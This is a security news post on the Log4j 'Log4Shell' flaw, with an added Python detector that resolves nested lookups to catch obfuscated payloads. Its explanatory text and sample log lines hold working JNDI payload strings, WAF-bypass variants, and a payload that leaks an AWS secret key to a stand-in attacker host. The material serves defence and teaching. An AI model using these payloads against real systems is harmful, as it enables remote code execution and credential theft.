CyberSecurity News - log4j week
December 12th
Log4j 2 added the JndiLookup plugin in 2013.
A JNDI lookup resolves a name such as ldap://localhost:389/o=JNDITutorial (the example from the Java JNDI tutorial) by asking the named LDAP server for the JNDITutorial object; Log4j hands whatever URL appears in the lookup to that same API.
The vulnerability was reported by Chen Zhaojun of the Alibaba Cloud Security Team and became public on Dec. 9. It was first seen exploited against Minecraft servers and was initially thought to affect only that gaming platform, but quick exploration showed that any software which logs untrusted input through this library is potentially affected.
Log4j's formatting language can evaluate ${...} lookups inside the data being logged, and one of those lookups is JNDI. So when a message containing the string ${jndi:ldap://attacker.com/pwnyourserver} is logged, Log4j performs a JNDI lookup: the JVM connects to the attacker's LDAP server, which returns a reference to a remote class or a serialized object; the JVM then fetches and deserializes or loads it and runs the attacker's code. No authentication or special privilege is needed, only a way to get the string into a logged field such as a User-Agent header or a username.
Since Apache log4j is used in countless applications, those applications inherit the vulnerability, e.g.:
- VMware vCenter - https://www.vmware.com/security/advisories/VMSA-2021-0028.html
- Apple iPhone -
- AWS secret keys: a payload such as ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker.com/a} exfiltrates the credential in the hostname of the lookup request itself, even if the second stage never runs
This has had blue teams and SOCs all over the world working hard this weekend, either patching or adding WAF rules.
Added to this headache, WAF bypasses are being found constantly: https://twitter.com/search?q=log4j%20waf%20bypass&src=typeahead_click&f=top . Variants such as ${${lower:j}ndi:...} or ${${::-j}ndi:...} collapse to the same ${jndi:...} lookup once Log4j evaluates the nested expressions, so a rule that matches the literal string ${jndi: is trivially evaded.
CrowdStrike, Splunk and Sumo Logic have released detection methods:
- https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
- https://github.com/SumoLogic/sumo-log4j-appender
- https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
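The following is an added example for this post, not code from Log4j or from any of the vendors linked above. It ties together the lookup mechanism described earlier (nested ${...} expressions are resolved innermost-first, with ${key:-default} supplying a fallback) and the WAF-bypass problem: a detector that evaluates the lookups the way Log4j would, and only then looks for ${jndi:, catches obfuscated payloads that a literal string match misses. Only the lower, upper and default-value forms are modelled; treating env:/sys: lookups of unknown names as falling through to their default is an assumption, and the sample log lines and attacker.example hostname are constructed.

```python
import re

# Added example: a normaliser modelled on Log4j 2's lookup substitution,
# used here for detection.  Not Log4j's own code.

# An innermost expression: '${' ... '}' with no nested '${' or '}' inside.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# What we look for in the *resolved* string, i.e. what Log4j would hand to
# JNDI.  Matched case-insensitively: Log4j's Interpolator lower-cases the
# lookup prefix before dispatch, so ${JNDI:...} fires as well.
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Lookups whose result depends only on their argument.
PURE_LOOKUPS = {
    "lower": str.lower,
    "upper": str.upper,
}


def _resolve_inner(body):
    """Resolve one innermost expression body (the text between '${' and '}')."""
    # '${key:-default}' supplies a default when 'key' cannot be resolved.
    key, has_default, default = body.partition(":-")
    prefix, _, arg = key.partition(":")
    if prefix.lower() in PURE_LOOKUPS:
        return PURE_LOOKUPS[prefix.lower()](arg)
    if has_default:
        # Assumption: env:/sys: lookups of a name that does not exist fall
        # through to the default, which is how the bypass payloads use them.
        return default
    # Unknown lookup and no default (e.g. the jndi: lookup itself): keep it
    # verbatim so the caller can inspect it.
    return "${" + body + "}"


def normalize_lookups(text, max_rounds=20):
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(lambda m: _resolve_inner(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def naive_match(line):
    """What a literal-string WAF rule sees: the raw text, case-folded."""
    return "${jndi:" in line.lower()


def detect_jndi(line):
    """Evaluate the lookups first, so the obfuscation collapses before matching."""
    return JNDI_PATTERN.search(normalize_lookups(line)) is not None


# Constructed sample access-log lines; the User-Agent is the last field and
# attacker.example is a made-up host.  Index 1 is the plain payload, indices
# 2 to 5 are bypass variants of the kind circulating on social media.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:J}ndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOT_SET_XYZ:-j}ndi:${lower:LDAP}://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:${lower:R}mi://attacker.example/a}"',
]


def scan(lines):
    """Return (index, resolved_line) for every line that resolves to a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        if detect_jndi(line):
            hits.append((i, normalize_lookups(line)))
    return hits


if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_LOG_LINES):
        print(i, "naive:", naive_match(line), "resolved:", detect_jndi(line))
```

Running the block shows the literal match firing only on the plain payload at index 1, while the resolving detector flags indices 1 through 5. The same normalisation step can be dropped in front of any of the vendor searches above; the point is to match on what the library will evaluate, not on the bytes the attacker chose to send.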
This vulnerability's CVE (CVE-2021-44228) was published on Friday, Dec. 10; it had been exploited for a while before that.
Since social media is full of shared exploitation payloads (as happens with any exploit), and social media is constantly scraped for analytics and state monitoring, any scraping tool that logs the scraped text through a vulnerable log4j can be exploited by accident, without ever being targeted directly.
Rumble has published a list of vulnerable applications:
https://www.rumble.run/blog/finding-log4j/
@GossiTheDog has also published a list; it is kept up to date and should be read by everyone.